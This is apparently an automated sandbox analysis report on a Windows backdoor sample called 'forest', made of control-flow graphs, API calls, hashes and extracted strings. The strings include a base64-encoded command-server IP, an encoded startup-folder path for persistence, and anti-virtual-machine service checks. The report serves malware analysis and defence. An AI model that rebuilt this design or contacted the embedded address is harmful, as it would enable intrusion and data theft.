50681->50607 50682->50610 50683->50613 50684->50615 50685->50618 50686->50621 50687->50623 50688->50625 50689->50627 50690->50631 50691->50634 50695->50652 50696->50655 50697->50657 50698->50659 50699->50663

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 7ff75bcf5040-7ff75bcf509c 1 7ff75bcf50a2-7ff75bcf50a7 0->1 2 7ff75bcf5667-7ff75bcf566c call 7ff75bcf29f0 0->2 4 7ff75bcf50ac-7ff75bcf5138 call 7ff75bd13e80 call 7ff75bd0a750 1->4 5 7ff75bcf50a9 1->5 9 7ff75bcf566d-7ff75bcf5672 call 7ff75bd53eb4 2->9 14 7ff75bcf513e-7ff75bcf51e6 call 7ff75bd0a750 * 2 4->14 15 7ff75bcf513a 4->15 5->4 16 7ff75bcf5673-7ff75bcf5678 call 7ff75bd53eb4 9->16 26 7ff75bcf51ec-7ff75bcf5271 call 7ff75bd0a750 * 2 14->26 27 7ff75bcf51e8 14->27 15->14 22 7ff75bcf5679-7ff75bcf567e call 7ff75bd53eb4 16->22 28 7ff75bcf567f-7ff75bcf5684 call 7ff75bd53eb4 22->28 36 7ff75bcf52a5-7ff75bcf52c4 26->36 37 7ff75bcf5273-7ff75bcf5285 26->37 27->26 35 7ff75bcf5685-7ff75bcf568a call 7ff75bd53eb4 28->35 47 7ff75bcf568b-7ff75bcf56ae call 7ff75bcf2a10 call 7ff75bd46e14 35->47 41 7ff75bcf52c6-7ff75bcf52d8 36->41 42 7ff75bcf52f8-7ff75bcf531a 36->42 39 7ff75bcf52a0 call 7ff75bd44d30 37->39 40 7ff75bcf5287-7ff75bcf529a 37->40 39->36 40->9 40->39 45 7ff75bcf52f3 call 7ff75bd44d30 41->45 46 7ff75bcf52da-7ff75bcf52ed 41->46 48 7ff75bcf5351-7ff75bcf5376 42->48 49 7ff75bcf531c-7ff75bcf5331 42->49 45->42 46->16 46->45 69 7ff75bcf56b3-7ff75bcf56d6 call 7ff75bcf2a10 call 7ff75bd46e14 47->69 50 7ff75bcf53ad-7ff75bcf53d2 48->50 51 7ff75bcf5378-7ff75bcf538d 48->51 54 7ff75bcf5333-7ff75bcf5346 49->54 55 7ff75bcf534c call 7ff75bd44d30 49->55 58 7ff75bcf53d4-7ff75bcf53e9 50->58 59 7ff75bcf5409-7ff75bcf545d call 7ff75bcf4db0 50->59 56 7ff75bcf538f-7ff75bcf53a2 51->56 57 7ff75bcf53a8 call 7ff75bd44d30 51->57 54->22 54->55 55->48 56->28 56->57 57->50 63 7ff75bcf5404 call 7ff75bd44d30 58->63 64 7ff75bcf53eb-7ff75bcf53fe 58->64 59->47 73 7ff75bcf5463-7ff75bcf5487 59->73 63->59 64->35 64->63 75 7ff75bcf56db-7ff75bcf56fe call 7ff75bcf2a10 call 7ff75bd46e14 69->75 73->69 78 7ff75bcf548d-7ff75bcf54c1 73->78 82 7ff75bcf5703-7ff75bcf5726 call 7ff75bcf2a10 call 7ff75bd46e14 75->82 78->75 83 7ff75bcf54c7-7ff75bcf54dc 78->83 89 7ff75bcf572b-7ff75bcf574e call 7ff75bcf2a10 call 7ff75bd46e14 82->89 83->82 88 7ff75bcf54e2-7ff75bcf5504 83->88 88->89 93 7ff75bcf550a-7ff75bcf5517 88->93 95 7ff75bcf5753-7ff75bcf5776 call 7ff75bcf2a10 call 7ff75bd46e14 89->95 93->95 98 7ff75bcf551d-7ff75bcf552f 93->98 101 7ff75bcf577b-7ff75bcf57a6 call 7ff75bcf2a10 call 7ff75bd46e14 95->101 98->101 103 7ff75bcf5535-7ff75bcf5586 98->103 110 7ff75bcf57ab-7ff75bcf57dd call 7ff75bcf2a10 call 7ff75bd46e14 101->110 113 7ff75bcf5590-7ff75bcf5592 103->113 128 7ff75bcf57de-7ff75bcf57e3 call 7ff75bd53eb4 110->128 113->110 115 7ff75bcf5598-7ff75bcf55a8 113->115 117 7ff75bcf55df-7ff75bcf5604 115->117 118 7ff75bcf55aa-7ff75bcf55bf 115->118 123 7ff75bcf5606-7ff75bcf561b 117->123 124 7ff75bcf563b-7ff75bcf5666 call 7ff75bd44d10 117->124 120 7ff75bcf55c1-7ff75bcf55d4 118->120 121 7ff75bcf55da call 7ff75bd44d30 118->121 120->121 120->128 121->117 125 7ff75bcf5636 call 7ff75bd44d30 123->125 126 7ff75bcf561d-7ff75bcf5630 123->126 125->124 126->125 130 7ff75bcf57e4-7ff75bcf57e9 call 7ff75bd53eb4 126->130 128->130
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: ", "id":"$GET$Where are my socks?$Winhttp.dll${"n":"
    • API String ID: 3668304517-3084486490
    • Opcode ID: 52c6d12674501996d600ae5c6b18087dcd41be30664ee04f3a59ddbf578eb56f
    • Instruction ID: 6621d7d82cf1443385590038eedc0198d38f5f8c1dc38271de91cf7c3c523b0d
    • Opcode Fuzzy Hash: 52c6d12674501996d600ae5c6b18087dcd41be30664ee04f3a59ddbf578eb56f
    • Instruction Fuzzy Hash: 5A12B962E18BC281FA14EB2CE4513B9B361FB95790F949231EA9D026B6DF7CE185C710

    Control-flow Graph

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID: NDUuNjYuMjQ5LjI0OQ==$UXpwY1ZYTmxjbk5j$WEVGd2NFUmhkR0ZjVW05aGJXbHVaMXhOYVdOeWIzTnZablJjVjJsdVpHOTNjMXhUZEdGeWRDQk5aVzUxWEZCeWIyZHlZVzF6WEZOMFlYSjBkWEJjVjJsdVpHOTNjMU5XUXk1c2Jtcz0=$Zm9yZXN0$sock
    • API String ID: 0-1601384142
    • Opcode ID: 838d58c21301ba66f7a004aa24602807d6e513183d783e348904fbaeeaa868b4
    • Instruction ID: 715689177edc58741a89aac5ddec7f482bdc01fb65f9ff6e9533dfc852daa371
    • Opcode Fuzzy Hash: 838d58c21301ba66f7a004aa24602807d6e513183d783e348904fbaeeaa868b4
    • Instruction Fuzzy Hash: B271B472B04B8285E718EB69E8541FDB3A5FB84384F884135EA4D5BBA9EF7CD141C710

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 268 7ff75bcf46d0-7ff75bcf47a2 SHTestTokenMembership call 7ff75bd71650 GetUserNameA 271 7ff75bcf47a5-7ff75bcf47ad 268->271 271->271 272 7ff75bcf47af-7ff75bcf47c5 call 7ff75bd0f390 271->272 275 7ff75bcf4822 272->275 276 7ff75bcf47c7-7ff75bcf47cf 272->276 277 7ff75bcf4827-7ff75bcf482b 275->277 278 7ff75bcf4801-7ff75bcf4820 276->278 279 7ff75bcf47d1-7ff75bcf47de 276->279 280 7ff75bcf485f-7ff75bcf488e GetComputerNameA 277->280 281 7ff75bcf482d-7ff75bcf483f 277->281 278->277 282 7ff75bcf47e0-7ff75bcf47f3 279->282 283 7ff75bcf47fc call 7ff75bd44d30 279->283 287 7ff75bcf4893-7ff75bcf489a 280->287 285 7ff75bcf4841-7ff75bcf4854 281->285 286 7ff75bcf485a call 7ff75bd44d30 281->286 288 7ff75bcf4aee-7ff75bcf4af3 call 7ff75bd53eb4 282->288 289 7ff75bcf47f9 282->289 283->278 285->286 285->288 286->280 287->287 291 7ff75bcf489c-7ff75bcf48b6 call 7ff75bd0f390 287->291 289->283 296 7ff75bcf4918 291->296 297 7ff75bcf48b8-7ff75bcf48c1 291->297 298 7ff75bcf491d-7ff75bcf4921 296->298 299 7ff75bcf48c3-7ff75bcf48d1 297->299 300 7ff75bcf48f4-7ff75bcf4916 297->300 301 7ff75bcf4955-7ff75bcf4993 GetModuleFileNameW 298->301 302 7ff75bcf4923-7ff75bcf4935 298->302 303 7ff75bcf48d3-7ff75bcf48e6 299->303 304 7ff75bcf48ef call 7ff75bd44d30 299->304 300->298 310 7ff75bcf49a5-7ff75bcf49ba call 7ff75bd14e80 301->310 311 7ff75bcf4995-7ff75bcf49a3 301->311 308 7ff75bcf4950 call 7ff75bd44d30 302->308 309 7ff75bcf4937-7ff75bcf494a 302->309 305 7ff75bcf4ae2-7ff75bcf4ae7 call 7ff75bd53eb4 303->305 306 7ff75bcf48ec 303->306 304->300 324 7ff75bcf4ae8-7ff75bcf4aed call 7ff75bd53eb4 305->324 306->304 308->301 309->305 309->308 314 7ff75bcf49bf-7ff75bcf49c6 310->314 311->314 316 7ff75bcf4a2e-7ff75bcf4a43 314->316 317 7ff75bcf49c8-7ff75bcf49f2 314->317 322 7ff75bcf4a45-7ff75bcf4a49 316->322 323 7ff75bcf4a67-7ff75bcf4a76 call 7ff75bd10210 316->323 320 7ff75bcf4aaf-7ff75bcf4ae1 call 7ff75bd44d10 317->320 321 7ff75bcf49f8-7ff75bcf4a0a 317->321 325 7ff75bcf4a10-7ff75bcf4a23 321->325 326 7ff75bcf4aa9-7ff75bcf4aae call 7ff75bd44d30 321->326 328 7ff75bcf4a4e-7ff75bcf4a65 call 7ff75bd70fb0 322->328 329 7ff75bcf4a4b 322->329 340 7ff75bcf4a7b-7ff75bcf4a7f 323->340 324->288 325->324 333 7ff75bcf4a29 325->333 326->320 328->340 329->328 333->326 340->320 341 7ff75bcf4a81-7ff75bcf4a8f 340->341 342 7ff75bcf4aa6 341->342 343 7ff75bcf4a91-7ff75bcf4aa4 341->343 342->326 343->324 343->342
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Name_invalid_parameter_noinfo_noreturn$ComputerFileMembershipModuleTestTokenUser
    • String ID:
    • API String ID: 1487706099-0
    • Opcode ID: a2be92b86f2a76cd6de73feddaf6bbaf57d5d00667dee1a597eb8376ca4a82ac
    • Instruction ID: 07654d9390cabceeb03c7727478ab19e10484a139255af365f1564dc85cd60b9
    • Opcode Fuzzy Hash: a2be92b86f2a76cd6de73feddaf6bbaf57d5d00667dee1a597eb8376ca4a82ac
    • Instruction Fuzzy Hash: A2C10462F18B8181EA00DB29D4543BDA764FB557D4F955372EAAC02AEAEF7CE1C1C310

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: /bc$002$003$GET$pRequest
    • API String ID: 3668304517-2660936391
    • Opcode ID: 6821f11a4b0029687b84fdeaf5abc130de5222e1d40ca23e82932a065d35dbd9
    • Instruction ID: a24a4b81a20548086620aba03bf9b0b887d84cecb6948a666e05b48edd9a4beb
    • Opcode Fuzzy Hash: 6821f11a4b0029687b84fdeaf5abc130de5222e1d40ca23e82932a065d35dbd9
    • Instruction Fuzzy Hash: 02816272A18B9681FB28EB29E4517B9B361FB84B80FC88135E64D43679DF3CE545C720

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: ", "v":"$NDUuNjYuMjQ5LjI0OQ==$Zm9yZXN0$invalid stoi argument$sock$stoi argument out of range${"n":"${"status":"004"}${"status":"005"}${"status":"026"}${"status":"105"}
    • API String ID: 3668304517-2369935561
    • Opcode ID: 8d6a0734a1a2f6107b3da3b6a01a667e0bd6b3a308cb62972b779b33c1b19ff9
    • Instruction ID: a4df83f8b8712876e4a38ebc5cbb1071e55c9f329decb93aec0cb88702571e37
    • Opcode Fuzzy Hash: 8d6a0734a1a2f6107b3da3b6a01a667e0bd6b3a308cb62972b779b33c1b19ff9
    • Instruction Fuzzy Hash: D0F0B4A1B1434941FB1DBB2AD05437D6251DB44FC8FE84030CA4C0A79AEF6ED4D68360

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: GdipOpenService_invalid_parameter_noinfo_noreturn$DisposeFreeImageManagerQueryStatus
    • String ID: Seems ok$Vk1Ub29scw==$VkJveFNlcnZpY2U=
    • API String ID: 3199510081-3703604791
    • Opcode ID: 540f9263f055597c8382bee0da1726551e37c503f22e868b7c55dda0e55a9baf
    • Instruction ID: 60de68ab99bb48f07fa60be47b828335b06db14910ff2172cfecb5ab613a2c49
    • Opcode Fuzzy Hash: 540f9263f055597c8382bee0da1726551e37c503f22e868b7c55dda0e55a9baf
    • Instruction Fuzzy Hash: DC717172F14B4685EB04EF69E8502FDB361FB88798F984235EA4D13A69EF38D585C310

    Control-flow Graph

    APIs
    • FreeLibrary.KERNEL32(?,?,7FFFFFFFFFFFFFFF,00007FF75BD5F2BC,?,?,?,?,00007FF75BD54209,?,?,?,?,00007FF75BD1FA4C), ref: 00007FF75BD5EA73
    • GetProcAddressForCaller.KERNELBASE(?,?,7FFFFFFFFFFFFFFF,00007FF75BD5F2BC,?,?,?,?,00007FF75BD54209,?,?,?,?,00007FF75BD1FA4C), ref: 00007FF75BD5EA7F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: AddressCallerFreeLibraryProc
    • String ID: api-ms-$ext-ms-
    • API String ID: 3520295827-537541572
    • Opcode ID: 912c94047a0cb9539cafd7d5ce12736182df3d91ecf7096a8cea6366d4922533
    • Instruction ID: 89dce77b0eac8833ed1936d30a2abeac0e1b8676fd361057847ae740f82c6e43
    • Opcode Fuzzy Hash: 912c94047a0cb9539cafd7d5ce12736182df3d91ecf7096a8cea6366d4922533
    • Instruction Fuzzy Hash: 1F41E66171970282FA29BB2EA8502B5E791BF45BD0F8C4135ED1D477A4EE3CE441C324

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
    • String ID:
    • API String ID: 3251591375-0
    • Opcode ID: e4a17efe478abd50984052b8a0019fdc49fd87fe32912cdc85873eec47f6ce3e
    • Instruction ID: 3fd04ad1153055cf024712d959d3b822eafb583b75d5127e47575b45e570dd9f
    • Opcode Fuzzy Hash: e4a17efe478abd50984052b8a0019fdc49fd87fe32912cdc85873eec47f6ce3e
    • Instruction Fuzzy Hash: CC314B25E0D30385FA1CBB6CA4913B9A2819F51788FCC50B5DA4E1B6F7DEEDE9448270

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 525 7ff75bcf1de0-7ff75bcf1e0c LoadLibraryA
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID: Winhttp.dll
    • API String ID: 1029625771-1936088768
    • Opcode ID: 7a429ab9266b4f3fffa479279b48a073b534981f8cae20d0d5e5bf2d62eddd7e
    • Instruction ID: a6cef964f7bf617d0ec8709ddf047539c02cfe4a7242b6b7cdfa8558b060284d
    • Opcode Fuzzy Hash: 7a429ab9266b4f3fffa479279b48a073b534981f8cae20d0d5e5bf2d62eddd7e
    • Instruction Fuzzy Hash: BED0E925E5AB02C2FB18BF29EC95034A2A4BB58755FC80175C44E85235DF2DA599C724

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: dc89c29555d5d88225e870e6d7040d38a1bbc348fd38f3aaa4cad493a1cad2d3
    • Instruction ID: 88769005551cb5985f04df04a7c78ecfaf8b159498594590b37c3ca495d464df
    • Opcode Fuzzy Hash: dc89c29555d5d88225e870e6d7040d38a1bbc348fd38f3aaa4cad493a1cad2d3
    • Instruction Fuzzy Hash: C7116D3690DB8282F318AF18A880579E7A0FB48B40F9D0535EA5D476B6DE3CE8508B20

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: ad82f3d5463a9e98e1552197bf2295ae65c8778a080b52305350446953181a80
    • Instruction ID: 028a7d0f18d7772ccafc1803e9f953bb7c7e8cf9a72b77aa651e12980904e845
    • Opcode Fuzzy Hash: ad82f3d5463a9e98e1552197bf2295ae65c8778a080b52305350446953181a80
    • Instruction Fuzzy Hash: C8E01275E0930386FA1D7B5D84813B9E2905F44340FD84934D60D462E2DE7D28025A39

    Control-flow Graph

    APIs
    • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF75BD44E94
      • Part of subcall function 00007FF75BD47120: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF75BD47128
      • Part of subcall function 00007FF75BD47120: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF75BD4712D
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
    • String ID:
    • API String ID: 1208906642-0
    • Opcode ID: 39a315521b5a0a89ce840e419fc18619f359d4d2551cdf961bb8d95cb46cf093
    • Instruction ID: 8c9c93edf6ea663c1d59d3b22fc7ee17920e5d32c23fc14fefb5dabae84cb6ef
    • Opcode Fuzzy Hash: 39a315521b5a0a89ce840e419fc18619f359d4d2551cdf961bb8d95cb46cf093
    • Instruction Fuzzy Hash: 13E0EC10D0D35340FEAC7B6C12432B8D6841F2234AEDC18F8E45D121F3ADDE72861A71

    Control-flow Graph

    APIs
    • HeapAlloc.KERNEL32(?,?,00000000,00007FF75BD5E3CA,?,?,8000000000000000,00007FF75BD51C85,?,?,?,?,00007FF75BD5DB64), ref: 00007FF75BD5D64D
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
